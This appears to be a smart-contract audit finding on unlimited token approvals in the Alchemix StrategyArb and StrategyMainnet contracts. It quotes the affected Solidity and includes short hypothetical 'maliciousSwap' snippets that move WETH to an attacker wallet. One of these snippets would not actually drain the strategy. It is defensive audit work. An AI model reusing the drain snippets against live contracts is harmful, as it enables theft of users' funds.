Alchemix Transmuter

Title

Summary

The StrategyArb and StrategyMainnet contracts exhibit a high-severity vulnerability stemming from the approval of unlimited tokens (type(uint256).max) to external contracts (transmuter, router, and Curve RouterNG). This unrestricted approval introduces a severe risk of fund mismanagement or loss if these external contracts are compromised.

Technical Details

1. Unlimited Approvals in StrategyArb

The StrategyArb contract approves unlimited tokens for both the transmuter and router during initialization and router updates.

Code Reference:

• Unlimited approval in _initStrategy:

  function _initStrategy() internal {

  router = 0xAAA87963EFeB6f7E0a2711F397663105Acb1805e;

  underlying.safeApprove(address(router), type(uint256).max);

  }

  ​

• Unlimited approval on router update:

  function setRouter(address _router) external onlyManagement {

  router = _router;

  underlying.safeApprove(router, type(uint256).max);

  }

  ​

Workflow Context:

1. The underlying token (WETH) is approved for spending by the router.

2. These approvals are not capped or revoked, allowing full control of all tokens held by the strategy if the router is compromised.

2. Unlimited Approvals in StrategyMainnet

The StrategyMainnet contract approves the maximum possible amount of underlying tokens to the Curve RouterNG during initialization and router updates.

Code Reference:

• Unlimited approval in _initStrategy:

  function _initStrategy() internal {

  router = ICurveRouterNG(0xF0d4c12A5768D806021F80a262B4d39d26C58b8D);

  underlying.safeApprove(address(router), type(uint256).max);

  }

  ​

Workflow Context:

1. The underlying token (WETH) is approved for spending by the Curve RouterNG.

2. If the Curve RouterNG is compromised, attackers can transfer all approved tokens.

Exploitation Scenarios

Scenario 1: Compromised Router in StrategyArb

1. An attacker compromises the router contract.

2. They execute unauthorized transfers of underlying tokens due to the unlimited approval.

   function maliciousSwap() external {

   token.transfer(0xAttackerWallet, token.balanceOf(address(this)));

   }

   ​

3. Result: Complete loss of all underlying tokens held in the strategy.

Quantifiable Example:

• Assume the strategy holds 10,000 WETH (~$20M at $2,000/WETH).

• The compromised router drains all tokens in a single transaction.

Scenario 2: Compromised Curve RouterNG in StrategyMainnet

1. An attacker compromises the Curve RouterNG contract.

2. They exploit the unlimited token approval to transfer all tokens:

   function maliciousSwap() external {

   token.transferFrom(strategyContract, attackerWallet, token.balanceOf(strategyContract));

   }

   ​

3. Result: Complete loss of all underlying tokens (WETH).

Quantifiable Example:

• Assume the strategy holds 20,000 WETH (~$40M at $2,000/WETH).

• The compromised Curve RouterNG drains all assets.

Impact Analysis

Severity:

• Financial Loss: Unlimited approvals expose the strategy to complete asset loss.

• Operational Disruption: Fund mismanagement causes a halt in strategy operations.

• Reputational Damage: Loss of user trust in the protocol.

Impact Summary:

• Total financial risk for both contracts exceeds $60M in the above examples.

Root Cause Analysis

1. Unrestricted Approvals:

   • Approvals are set to type(uint256).max without limits or constraints.

Mitigation Recommendations

1. Limit Approvals to Required Amounts

Approve only the amount needed for specific transactions:

2. Implement Time-Limited Approvals

Use time-bound or event-bound approvals to minimize exposure.